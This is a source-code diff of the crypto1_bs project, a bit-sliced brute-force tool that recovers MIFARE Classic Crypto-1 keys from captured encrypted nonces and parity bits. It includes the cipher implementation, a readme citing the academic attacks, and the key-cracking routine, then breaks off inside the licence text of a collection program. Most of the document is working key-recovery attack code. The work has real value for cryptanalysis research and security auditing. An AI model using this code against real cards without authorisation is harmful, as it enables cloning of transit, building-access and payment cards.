s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);
|
||||
|
||||
return ret;
|
||||
}
|
||||
uint8_t crypto1_byte(struct Crypto1State *s, uint8_t in, int is_encrypted)
|
||||
{
|
||||
uint8_t i, ret = 0;
|
||||
|
||||
for (i = 0; i < 8; ++i)
|
||||
ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i;
|
||||
|
||||
return ret;
|
||||
}
|
||||
uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted)
|
||||
{
|
||||
uint32_t i, ret = 0;
|
||||
|
||||
for (i = 0; i < 32; ++i)
|
||||
ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
/* prng_successor
|
||||
* helper used to obscure the keystream during authentication
|
||||
*/
|
||||
uint32_t prng_successor(uint32_t x, uint32_t n)
|
||||
{
|
||||
SWAPENDIAN(x);
|
||||
while(n--)
|
||||
x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31;
|
||||
|
||||
return SWAPENDIAN(x);
|
||||
}
|
27
crypto1_bs/crapto1-v3.3/readme
Executable file
27
crypto1_bs/crapto1-v3.3/readme
Executable file
@ -0,0 +1,27 @@
|
||||
CRAPTO1
|
||||
-------
|
||||
Provides a set of library functions which aid the verification
|
||||
of crypto1 weaknesses.
|
||||
|
||||
In short a partial implementation of:
|
||||
Dismantling MIFARE Classic
|
||||
URL: http://www.sos.cs.ru.nl/applications/rfid/2008-esorics.pdf
|
||||
Flavio D. Garcia, Gerhard de Koning Gans, Ruben Muijrers,
|
||||
Peter van Rossum, Roel Verdult, Ronny Wichers Schreur, Bart Jacobs
|
||||
Institute for Computing and Information Sciences,
|
||||
Radboud University Nijmegen, The Netherlands
|
||||
{{flaviog,petervr,ronny,bart}@cs, {gkoningg,rmuijrer,rverdult}@sci}.ru.nl
|
||||
and
|
||||
Wirelessly Pickpocketing a Mifare Classic Card
|
||||
URL: http://www.cs.ru.nl/~flaviog/publications/Pickpocketing.Mifare.pdf
|
||||
Flavio D. Garcia, Peter van Rossum, Roel Verdult, Ronny Wichers Schreur
|
||||
Radboud University Nijmegen, The Netherlands
|
||||
{flaviog,petervr,rverdult,ronny}@cs.ru.nl
|
||||
and
|
||||
THE DARK SIDE OF SECURITY BY OBSCURITY
|
||||
URL: http://eprint.iacr.org/2009/137
|
||||
and Cloning MiFare Classic Rail and Building Passes, Anywhere, Anytime
|
||||
Nicolas T. Courtois
|
||||
University College London, Computer Science,
|
||||
Gower street, WC1E 6BT, London, UK
|
||||
|
121
crypto1_bs/crypto1_bs.c
Normal file
121
crypto1_bs/crypto1_bs.c
Normal file
@ -0,0 +1,121 @@
|
||||
// Bit-sliced Crypto-1 implementation
|
||||
// The cipher states are stored with the least significant bit first, hence all bit indexes are reversed here
|
||||
/*
|
||||
Copyright (c) 2015-2016 Aram Verstegen
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in
|
||||
all copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
THE SOFTWARE.
|
||||
*/
|
||||
|
||||
#include "crypto1_bs.h"
|
||||
#include <inttypes.h>
|
||||
#define __STDC_FORMAT_MACROS
|
||||
#define llx PRIx64
|
||||
#define lli PRIi64
|
||||
#define lu PRIu32
|
||||
|
||||
// The following functions use this global or thread-local state
|
||||
// It is sized to fit exactly KEYSTREAM_SIZE more states next to the initial state
|
||||
__thread bitslice_t states[KEYSTREAM_SIZE+STATE_SIZE];
|
||||
__thread bitslice_t * restrict state_p;
|
||||
|
||||
void crypto1_bs_init(){
|
||||
// initialize constant one and zero bit vectors
|
||||
memset(bs_ones.bytes, 0xff, VECTOR_SIZE);
|
||||
memset(bs_zeroes.bytes, 0x00, VECTOR_SIZE);
|
||||
}
|
||||
|
||||
// The following functions have side effects on 48 bitslices at the state_p pointer
|
||||
// use the crypto1_bs_rewind_* macros to (re-)initialize them as needed
|
||||
|
||||
inline const bitslice_value_t crypto1_bs_bit(const bitslice_value_t input, const bool is_encrypted){
|
||||
bitslice_value_t feedback = (state_p[47- 0].value ^ state_p[47- 5].value ^ state_p[47- 9].value ^
|
||||
state_p[47-10].value ^ state_p[47-12].value ^ state_p[47-14].value ^
|
||||
state_p[47-15].value ^ state_p[47-17].value ^ state_p[47-19].value ^
|
||||
state_p[47-24].value ^ state_p[47-25].value ^ state_p[47-27].value ^
|
||||
state_p[47-29].value ^ state_p[47-35].value ^ state_p[47-39].value ^
|
||||
state_p[47-41].value ^ state_p[47-42].value ^ state_p[47-43].value);
|
||||
const bitslice_value_t ks_bits = crypto1_bs_f20(state_p);
|
||||
if(is_encrypted){
|
||||
feedback ^= ks_bits;
|
||||
}
|
||||
state_p--;
|
||||
state_p[0].value = feedback ^ input;
|
||||
return ks_bits;
|
||||
}
|
||||
|
||||
inline const bitslice_value_t crypto1_bs_lfsr_rollback(const bitslice_value_t input, const bool is_encrypted){
|
||||
bitslice_value_t feedout = state_p[0].value;
|
||||
state_p++;
|
||||
const bitslice_value_t ks_bits = crypto1_bs_f20(state_p);
|
||||
if(is_encrypted){
|
||||
feedout ^= ks_bits;
|
||||
}
|
||||
const bitslice_value_t feedback = (feedout ^ state_p[47- 5].value ^ state_p[47- 9].value ^
|
||||
state_p[47-10].value ^ state_p[47-12].value ^ state_p[47-14].value ^
|
||||
state_p[47-15].value ^ state_p[47-17].value ^ state_p[47-19].value ^
|
||||
state_p[47-24].value ^ state_p[47-25].value ^ state_p[47-27].value ^
|
||||
state_p[47-29].value ^ state_p[47-35].value ^ state_p[47-39].value ^
|
||||
state_p[47-41].value ^ state_p[47-42].value ^ state_p[47-43].value);
|
||||
state_p[47].value = feedback ^ input;
|
||||
return ks_bits;
|
||||
}
|
||||
|
||||
// side-effect free from here on
|
||||
// note that bytes are sliced and unsliced with reversed endianness
|
||||
inline void crypto1_bs_convert_states(bitslice_t bitsliced_states[], state_t regular_states[]){
|
||||
size_t bit_idx = 0, slice_idx = 0;
|
||||
state_t values[MAX_BITSLICES];
|
||||
memset(values, 0x0, sizeof(values));
|
||||
for(slice_idx = 0; slice_idx < MAX_BITSLICES; slice_idx++){
|
||||
for(bit_idx = 0; bit_idx < STATE_SIZE; bit_idx++){
|
||||
bool bit = get_vector_bit(slice_idx, bitsliced_states[bit_idx]);
|
||||
values[slice_idx].value <<= 1;
|
||||
values[slice_idx].value |= bit;
|
||||
}
|
||||
// swap endianness
|
||||
values[slice_idx].value = rev_state_t(values[slice_idx].value);
|
||||
// roll off unused bits
|
||||
values[slice_idx].value >>= ((sizeof(state_t)*8)-STATE_SIZE);
|
||||
}
|
||||
memcpy(regular_states, values, sizeof(values));
|
||||
}
|
||||
|
||||
// bitslice a value
|
||||
void crypto1_bs_bitslice_value32(uint32_t value, bitslice_t bitsliced_value[], size_t bit_len){
|
||||
// load nonce bytes with unswapped endianness
|
||||
size_t bit_idx;
|
||||
for(bit_idx = 0; bit_idx < bit_len; bit_idx++){
|
||||
bool bit = get_bit(bit_len-1-bit_idx, rev32(value));
|
||||
if(bit){
|
||||
bitsliced_value[bit_idx].value = bs_ones.value;
|
||||
} else {
|
||||
bitsliced_value[bit_idx].value = bs_zeroes.value;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void crypto1_bs_print_states(bitslice_t bitsliced_states[]){
|
||||
size_t slice_idx = 0;
|
||||
state_t values[MAX_BITSLICES];
|
||||
crypto1_bs_convert_states(bitsliced_states, values);
|
||||
for(slice_idx = 0; slice_idx < MAX_BITSLICES; slice_idx++){
|
||||
printf("State %03zu: %012"llx"\n", slice_idx, values[slice_idx].value);
|
||||
}
|
||||
}
|
||||
|
99
crypto1_bs/crypto1_bs.h
Normal file
99
crypto1_bs/crypto1_bs.h
Normal file
@ -0,0 +1,99 @@
|
||||
#ifndef _CRYPTO1_BS_H
|
||||
#define _CRYPTO1_BS_H
|
||||
#include <stdbool.h>
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
// bitslice type
|
||||
// while AVX supports 256 bit vector floating point operations, we need integer operations for boolean logic
|
||||
// same for AVX2 and 512 bit vectors
|
||||
// using larger vectors works but seems to generate more register pressure
|
||||
#if defined(__AVX2__)
|
||||
#define MAX_BITSLICES 256
|
||||
#elif defined(__AVX__)
|
||||
#define MAX_BITSLICES 128
|
||||
#elif defined(__SSE2__)
|
||||
#define MAX_BITSLICES 128
|
||||
#else
|
||||
#define MAX_BITSLICES 64
|
||||
#endif
|
||||
|
||||
#define VECTOR_SIZE (MAX_BITSLICES/8)
|
||||
typedef unsigned int __attribute__((aligned(VECTOR_SIZE))) __attribute__((vector_size(VECTOR_SIZE))) bitslice_value_t;
|
||||
typedef union {
|
||||
bitslice_value_t value;
|
||||
uint64_t bytes64[MAX_BITSLICES/64];
|
||||
uint8_t bytes[MAX_BITSLICES/8];
|
||||
} bitslice_t;
|
||||
|
||||
// filter function (f20)
|
||||
// sourced from ``Wirelessly Pickpocketing a Mifare Classic Card'' by Flavio Garcia, Peter van Rossum, Roel Verdult and Ronny Wichers Schreur
|
||||
#define f20a(a,b,c,d) (((a|b)^(a&d))^(c&((a^b)|d)))
|
||||
#define f20b(a,b,c,d) (((a&b)|c)^((a^b)&(c|d)))
|
||||
#define f20c(a,b,c,d,e) ((a|((b|e)&(d^e)))^((a^(b&d))&((c^d)|(b&e))))
|
||||
|
||||
#define crypto1_bs_f20(s) \
|
||||
f20c(f20a((s[47- 9].value), (s[47-11].value), (s[47-13].value), (s[47-15].value)), \
|
||||
f20b((s[47-17].value), (s[47-19].value), (s[47-21].value), (s[47-23].value)), \
|
||||
f20b((s[47-25].value), (s[47-27].value), (s[47-29].value), (s[47-31].value)), \
|
||||
f20a((s[47-33].value), (s[47-35].value), (s[47-37].value), (s[47-39].value)), \
|
||||
f20b((s[47-41].value), (s[47-43].value), (s[47-45].value), (s[47-47].value)))
|
||||
|
||||
// bit indexing
|
||||
#define get_bit(n, word) ((word >> (n)) & 1)
|
||||
#define get_vector_bit(slice, value) get_bit(slice&0x3f, value.bytes64[slice>>6])
|
||||
|
||||
// constant ones/zeroes
|
||||
bitslice_t bs_ones;
|
||||
bitslice_t bs_zeroes;
|
||||
|
||||
// size of crypto-1 state
|
||||
#define STATE_SIZE 48
|
||||
// size of nonce to be decrypted
|
||||
#define KEYSTREAM_SIZE 32
|
||||
// size of first uid^nonce byte to be rolled back to the initial key
|
||||
#define ROLLBACK_SIZE 8
|
||||
// number of nonces required to test to cover entire 48-bit state
|
||||
// I would have said it's 12... but bla goes with 100, so I do too
|
||||
#define NONCE_TESTS 100
|
||||
|
||||
// state pointer management
|
||||
extern __thread bitslice_t states[KEYSTREAM_SIZE+STATE_SIZE];
|
||||
extern __thread bitslice_t * restrict state_p;
|
||||
|
||||
// rewind to the point a0, at which KEYSTREAM_SIZE more bits can be generated
|
||||
#define crypto1_bs_rewind_a0() (state_p = &states[KEYSTREAM_SIZE])
|
||||
|
||||
// bitsliced bytewise parity
|
||||
#define bitsliced_byte_parity(n) (n[0].value ^ n[1].value ^ n[2].value ^ n[3].value ^ n[4].value ^ n[5].value ^ n[6].value ^ n[7].value)
|
||||
|
||||
// 48-bit crypto-1 states are normally represented using 64-bit values
|
||||
typedef union {
|
||||
uint64_t value;
|
||||
uint8_t bytes[8];
|
||||
} state_t;
|
||||
|
||||
// endianness conversion
|
||||
#define rev32(word) (((word & 0xff) << 24) | (((word >> 8) & 0xff) << 16) | (((word >> 16) & 0xff) << 8) | (((word >> 24) & 0xff)))
|
||||
#define rev64(x) (rev32(x)<<32|(rev32((x>>32))))
|
||||
#define rev_state_t rev64
|
||||
|
||||
// crypto-1 functions
|
||||
const bitslice_value_t crypto1_bs_bit(const bitslice_value_t input, const bool is_encrypted);
|
||||
const bitslice_value_t crypto1_bs_lfsr_rollback(const bitslice_value_t input, const bool is_encrypted);
|
||||
|
||||
// initialization functions
|
||||
void crypto1_bs_init();
|
||||
|
||||
// conversion functions
|
||||
void crypto1_bs_bitslice_value32(uint32_t value, bitslice_t bitsliced_value[], size_t bit_len);
|
||||
void crypto1_bs_convert_states(bitslice_t bitsliced_states[], state_t regular_states[]);
|
||||
|
||||
// debug print
|
||||
void crypto1_bs_print_states(bitslice_t *bitsliced_states);
|
||||
|
||||
#endif // _CRYPTO1_BS_H
|
||||
|
256
crypto1_bs/crypto1_bs_crack.c
Normal file
256
crypto1_bs/crypto1_bs_crack.c
Normal file
@ -0,0 +1,256 @@
|
||||
// Bit-sliced Crypto-1 brute-forcing implementation
|
||||
// Builds on the data structures returned by CraptEV1 craptev1_get_space(nonces, threshold, uid)
|
||||
/*
|
||||
Copyright (c) 2015-2016 Aram Verstegen
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in
|
||||
all copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
THE SOFTWARE.
|
||||
*/
|
||||
|
||||
#include <stdlib.h>
|
||||
#ifndef __APPLE__
|
||||
#include <malloc.h>
|
||||
#endif
|
||||
#include "crypto1_bs_crack.h"
|
||||
|
||||
inline uint64_t crack_states_bitsliced(uint32_t **task){
|
||||
// the idea to roll back the half-states before combining them was suggested/explained to me by bla
|
||||
// first we pre-bitslice all the even state bits and roll them back, then bitslice the odd bits and combine the two in the inner loop
|
||||
uint64_t key = -1;
|
||||
#ifdef EXACT_COUNT
|
||||
size_t bucket_states_tested = 0;
|
||||
size_t bucket_size[(task[4]-task[3])/MAX_BITSLICES];
|
||||
#else
|
||||
const size_t bucket_states_tested = (task[4]-task[3])*(task[2]-task[1]);
|
||||
#endif
|
||||
// bitslice all the even states
|
||||
bitslice_t * restrict bitsliced_even_states[(task[4]-task[3])/MAX_BITSLICES];
|
||||
size_t bitsliced_blocks = 0;
|
||||
for(uint32_t const * restrict p_even = task[3]; p_even < task[4]; p_even+=MAX_BITSLICES){
|
||||
#ifdef __WIN32
|
||||
#ifdef __MINGW32__
|
||||
bitslice_t * restrict lstate_p = __mingw_aligned_malloc((STATE_SIZE+ROLLBACK_SIZE) * sizeof(bitslice_t), sizeof(bitslice_t));
|
||||
#else
|
||||
bitslice_t * restrict lstate_p = _aligned_malloc((STATE_SIZE+ROLLBACK_SIZE) * sizeof(bitslice_t), sizeof(bitslice_t));
|
||||
#endif
|
||||
#else
|
||||
#ifdef __APPLE__
|
||||
bitslice_t * restrict lstate_p = malloc((STATE_SIZE+ROLLBACK_SIZE) * sizeof(bitslice_t));
|
||||
#else
|
||||
bitslice_t * restrict lstate_p = memalign(sizeof(bitslice_t), (STATE_SIZE+ROLLBACK_SIZE) * sizeof(bitslice_t));
|
||||
#endif
|
||||
#endif
|
||||
memset(lstate_p, 0x0, (STATE_SIZE)*sizeof(bitslice_t));
|
||||
// bitslice even half-states
|
||||
const size_t max_slices = (task[4]-p_even) < MAX_BITSLICES ? task[4]-p_even : MAX_BITSLICES;
|
||||
#ifdef EXACT_COUNT
|
||||
bucket_size[bitsliced_blocks] = max_slices;
|
||||
#endif
|
||||
for(size_t slice_idx = 0; slice_idx < max_slices; ++slice_idx){
|
||||
// set even bits
|
||||
uint32_t e = *(p_even+slice_idx);
|
||||
for(size_t bit_idx = 1; bit_idx < STATE_SIZE; bit_idx+=2, e >>= 1){
|
||||
if(e&1){
|
||||
lstate_p[bit_idx].bytes64[slice_idx>>6] |= 1ull << (slice_idx&63);
|
||||
}
|
||||
}
|
||||
}
|
||||
// compute the rollback bits
|
||||
for(size_t rollback = 0; rollback < ROLLBACK_SIZE; ++rollback){
|
||||
// inlined crypto1_bs_lfsr_rollback
|
||||
const bitslice_value_t feedout = lstate_p[0].value;
|
||||
++lstate_p;
|
||||
const bitslice_value_t ks_bits = crypto1_bs_f20(lstate_p);
|
||||
const bitslice_value_t feedback = (feedout ^ ks_bits ^ lstate_p[47- 5].value ^ lstate_p[47- 9].value ^
|
||||
lstate_p[47-10].value ^ lstate_p[47-12].value ^ lstate_p[47-14].value ^
|
||||
lstate_p[47-15].value ^ lstate_p[47-17].value ^ lstate_p[47-19].value ^
|
||||
lstate_p[47-24].value ^ lstate_p[47-25].value ^ lstate_p[47-27].value ^
|
||||
lstate_p[47-29].value ^ lstate_p[47-35].value ^ lstate_p[47-39].value ^
|
||||
lstate_p[47-41].value ^ lstate_p[47-42].value ^ lstate_p[47-43].value);
|
||||
lstate_p[47].value = feedback ^ bitsliced_rollback_byte[rollback].value;
|
||||
}
|
||||
bitsliced_even_states[bitsliced_blocks++] = lstate_p;
|
||||
}
|
||||
// bitslice every odd state to every block of even half-states with half-finished rollback
|
||||
for(uint32_t const * restrict p_odd = task[1]; p_odd < task[2]; ++p_odd){
|
||||
// early abort
|
||||
if(keys_found){
|
||||
goto out;
|
||||
}
|
||||
|
||||
// set the odd bits and compute rollback
|
||||
uint64_t o = (uint64_t) *p_odd;
|
||||
lfsr_rollback_byte(&o, 0, 1);
|
||||
// pre-compute part of the odd feedback bits (minus rollback)
|
||||
bool odd_feedback_bit = parity(o&0x9ce5c);
|
||||
|
||||
crypto1_bs_rewind_a0();
|
||||
// set odd bits
|
||||
for(size_t state_idx = 0; state_idx < (STATE_SIZE-ROLLBACK_SIZE); o >>= 1, state_idx+=2){
|
||||
if(o & 1){
|
||||
state_p[state_idx] = bs_ones;
|
||||
} else {
|
||||
state_p[state_idx] = bs_zeroes;
|
||||
}
|
||||
}
|
||||
const bitslice_value_t odd_feedback = odd_feedback_bit ? bs_ones.value : bs_zeroes.value;
|
||||
|
||||
// set even and rollback bits
|
||||
for(size_t block_idx = 0; block_idx < bitsliced_blocks; ++block_idx){
|
||||
const bitslice_t * const restrict bitsliced_even_state = bitsliced_even_states[block_idx];
|
||||
size_t state_idx;
|
||||
// set even bits
|
||||
for(state_idx = 0; state_idx < (STATE_SIZE-ROLLBACK_SIZE); state_idx+=2){
|
||||
state_p[1+state_idx] = bitsliced_even_state[1+state_idx];
|
||||
}
|
||||
// set rollback bits
|
||||
uint64_t lo = o;
|
||||
for(; state_idx < STATE_SIZE; lo >>= 1, state_idx+=2){
|
||||
// set the odd bits and take in the odd rollback bits from the even states
|
||||
if(lo & 1){
|
||||
state_p[state_idx].value = ~bitsliced_even_state[state_idx].value;
|
||||
} else {
|
||||
state_p[state_idx] = bitsliced_even_state[state_idx];
|
||||
}
|
||||
|
||||
// set the even bits and take in the even rollback bits from the odd states
|
||||
if((lo >> 32) & 1){
|
||||
state_p[1+state_idx].value = ~bitsliced_even_state[1+state_idx].value;
|
||||
} else {
|
||||
state_p[1+state_idx] = bitsliced_even_state[1+state_idx];
|
||||
}
|
||||
}
|
||||
|
||||
#ifdef EXACT_COUNT
|
||||
// Fix a "1000000% bug". Looks like here is a problem with OS X gcc
|
||||
size_t current_bucket_size = bucket_size[block_idx] > MAX_BITSLICES ? MAX_BITSLICES : bucket_size[block_idx];
|
||||
|
||||
bucket_states_tested += current_bucket_size;
|
||||
#ifdef ONLINE_COUNT
|
||||
__atomic_fetch_add(&total_states_tested, current_bucket_size, __ATOMIC_RELAXED);
|
||||
#endif
|
||||
#else
|
||||
#ifdef ONLINE_COUNT
|
||||
__atomic_fetch_add(&total_states_tested, MAX_BITSLICES, __ATOMIC_RELAXED);
|
||||
#endif
|
||||
#endif
|
||||
// pre-compute first keystream and feedback bit vectors
|
||||
const bitslice_value_t ksb = crypto1_bs_f20(state_p);
|
||||
const bitslice_value_t fbb = (odd_feedback ^ state_p[47- 0].value ^ state_p[47- 5].value ^ // take in the even and rollback bits
|
||||
state_p[47-10].value ^ state_p[47-12].value ^ state_p[47-14].value ^
|
||||
state_p[47-24].value ^ state_p[47-42].value);
|
||||
|
||||
// vector to contain test results (1 = passed, 0 = failed)
|
||||
bitslice_t results = bs_ones;
|
||||
|
||||
for(size_t tests = 0; tests < NONCE_TESTS; ++tests){
|
||||
size_t parity_bit_idx = 0;
|
||||
bitslice_value_t fb_bits = fbb;
|
||||
bitslice_value_t ks_bits = ksb;
|
||||
state_p = &states[KEYSTREAM_SIZE-1];
|
||||
bitslice_value_t parity_bit_vector = bs_zeroes.value;
|
||||
|
||||
// highest bit is transmitted/received first
|
||||
for(int32_t ks_idx = KEYSTREAM_SIZE-1; ks_idx >= 0; --ks_idx, --state_p){
|
||||
// decrypt nonce bits
|
||||
const bitslice_value_t encrypted_nonce_bit_vector = bitsliced_encrypted_nonces[tests][ks_idx].value;
|
||||
const bitslice_value_t decrypted_nonce_bit_vector = (encrypted_nonce_bit_vector ^ ks_bits);
|
||||
|
||||
// compute real parity bits on the fly
|
||||
parity_bit_vector ^= decrypted_nonce_bit_vector;
|
||||
|
||||
// update state
|
||||
state_p[0].value = (fb_bits ^ decrypted_nonce_bit_vector);
|
||||
|
||||
// compute next keystream bit
|
||||
ks_bits = crypto1_bs_f20(state_p);
|
||||
|
||||
// for each byte:
|
||||
if((ks_idx&7) == 0){
|
||||
// get encrypted parity bits
|
||||
const bitslice_value_t encrypted_parity_bit_vector = bitsliced_encrypted_parity_bits[tests][parity_bit_idx++].value;
|
||||
|
||||
// decrypt parity bits
|
||||
const bitslice_value_t decrypted_parity_bit_vector = (encrypted_parity_bit_vector ^ ks_bits);
|
||||
|
||||
// compare actual parity bits with decrypted parity bits and take count in results vector
|
||||
results.value &= (parity_bit_vector ^ decrypted_parity_bit_vector);
|
||||
|
||||
// make sure we still have a match in our set
|
||||
// if(memcmp(&results, &bs_zeroes, sizeof(bitslice_t)) == 0){
|
||||
|
||||
// this is much faster on my gcc, because somehow a memcmp needlessly spills/fills all the xmm registers to/from the stack - ???
|
||||
// the short-circuiting also helps
|
||||
if(results.bytes64[0] == 0
|
||||
#if MAX_BITSLICES > 64
|
||||
&& results.bytes64[1] == 0
|
||||
#endif
|
||||
#if MAX_BITSLICES > 128
|
||||
&& results.bytes64[2] == 0
|
||||
&& results.bytes64[3] == 0
|
||||
#endif
|
||||
){
|
||||
goto stop_tests;
|
||||
}
|
||||
// this is about as fast but less portable (requires -std=gnu99)
|
||||
// asm goto ("ptest %1, %0\n\t"
|
||||
// "jz %l2" :: "xm" (results.value), "xm" (bs_ones.value) : "cc" : stop_tests);
|
||||
parity_bit_vector = bs_zeroes.value;
|
||||
}
|
||||
// compute next feedback bit vector
|
||||
fb_bits = (state_p[47- 0].value ^ state_p[47- 5].value ^ state_p[47- 9].value ^
|
||||
state_p[47-10].value ^ state_p[47-12].value ^ state_p[47-14].value ^
|
||||
state_p[47-15].value ^ state_p[47-17].value ^ state_p[47-19].value ^
|
||||
state_p[47-24].value ^ state_p[47-25].value ^ state_p[47-27].value ^
|
||||
state_p[47-29].value ^ state_p[47-35].value ^ state_p[47-39].value ^
|
||||
state_p[47-41].value ^ state_p[47-42].value ^ state_p[47-43].value);
|
||||
}
|
||||
}
|
||||
// all nonce tests were successful: we've found the key in this block!
|
||||
state_t keys[MAX_BITSLICES];
|
||||
crypto1_bs_convert_states(&states[KEYSTREAM_SIZE], keys);
|
||||
for(size_t results_idx = 0; results_idx < MAX_BITSLICES; ++results_idx){
|
||||
if(get_vector_bit(results_idx, results)){
|
||||
key = keys[results_idx].value;
|
||||
__atomic_fetch_add(&keys_found, 1, __ATOMIC_RELAXED);
|
||||
goto out;
|
||||
}
|
||||
}
|
||||
stop_tests:
|
||||
// prepare to set new states
|
||||
crypto1_bs_rewind_a0();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
out:
|
||||
for(size_t block_idx = 0; block_idx < bitsliced_blocks; ++block_idx){
|
||||
#ifdef __WIN32
|
||||
#ifdef __MINGW32__
|
||||
__mingw_aligned_free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
|
||||
#else
|
||||
_aligned_free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
|
||||
#endif
|
||||
#else
|
||||
free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
|
||||
#endif
|
||||
}
|
||||
#ifndef ONLINE_COUNT
|
||||
__atomic_fetch_add(&total_states_tested, bucket_states_tested, __ATOMIC_RELAXED);
|
||||
#endif
|
||||
return key;
|
||||
}
|
22
crypto1_bs/crypto1_bs_crack.h
Normal file
22
crypto1_bs/crypto1_bs_crack.h
Normal file
@ -0,0 +1,22 @@
|
||||
#ifndef _CRYPTO1_BS_CRACK_H
|
||||
#define _CRYPTO1_BS_CRACK_H
|
||||
#include <stdint.h>
|
||||
#include "crypto1_bs.h"
|
||||
#include "craptev1.h"
|
||||
uint64_t crack_states_bitsliced(uint32_t **task);
|
||||
size_t keys_found;
|
||||
uint64_t total_states_tested;
|
||||
uint64_t total_states;
|
||||
|
||||
// linked from crapto1.c file
|
||||
extern uint8_t lfsr_rollback_byte(uint64_t* s, uint32_t in, int fb);
|
||||
|
||||
#define ONLINE_COUNT
|
||||
#define EXACT_COUNT
|
||||
|
||||
// arrays of bitsliced states with identical values in all slices
|
||||
bitslice_t bitsliced_encrypted_nonces[NONCE_TESTS][STATE_SIZE];
|
||||
bitslice_t bitsliced_encrypted_parity_bits[NONCE_TESTS][STATE_SIZE];
|
||||
bitslice_t bitsliced_rollback_byte[ROLLBACK_SIZE];
|
||||
|
||||
#endif // _CRYPTO1_BS_CRACK_H
|
661
crypto1_bs/holycard_collect.c
Executable file
661
crypto1_bs/holycard_collect.c
Executable file
@ -0,0 +1,661 @@
|
||||
// Copyright (C) 2016 Aram Verstegen
|
||||
/*
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 2, June 1991
|
||||
|
||||
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
|
||||
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The licenses for most software are designed to take away your
|
||||
freedom to share and change it. By contrast, the GNU General Public
|
||||
License is intended to guarantee your freedom to share and change free
|
||||
software--to make sure the software is free for all its users. This
|
||||
General Public License applies to most of the Free Software
|
||||
Foundation's software and to any other program whose authors commit to
|
||||
using it. (Some other Free Software Foundation software is covered by
|
||||
the GNU Lesser General Public License instead.) You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
this service if you wish), that you receive source code or can get it
|
||||
if you want it, that you can change the software or use pieces of it
|
||||
in new free programs; and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to make restrictions that forbid
|
||||
anyone to deny you these rights or to ask you to surrender the rights.
|
||||
These restrictions translate to certain responsibilities for you if you
|
||||
distribute copies of the software, or if you modify it.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must give the recipients all the rights that
|
||||
you have. You must make sure that they, too, receive or can get the
|
||||
source code. And you must show them these terms so they know their
|
||||
rights.
|
||||
|
||||
We protect your rights with two steps: (1) copyright the software, and
|
||||
(2) offer you this license which gives you legal permission to copy,
|
||||
distribute and/or modify the software.
|
||||
|
||||
Also, for each author's protection and ours, we want to make certain
|
||||
that everyone understands that there is no warranty for this free
|
||||
software. If the software is modified by someone else and passed on, we
|
||||
want its recipients to know that what they have is not the original, so
|
||||
that any problems introduced by others will not reflect on the original
|
||||
authors' reputations.
|
||||
|
||||
Finally, any free program is threatened constantly by software
|
||||
patents. We wish to avoid the danger that redistributors of a free
|
||||
program will individually obtain patent licenses, in effect making the
|
||||
program proprietary. To prevent this, we have made it clear that any
|
||||
patent must be licensed for everyone's free use or not licensed at all.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
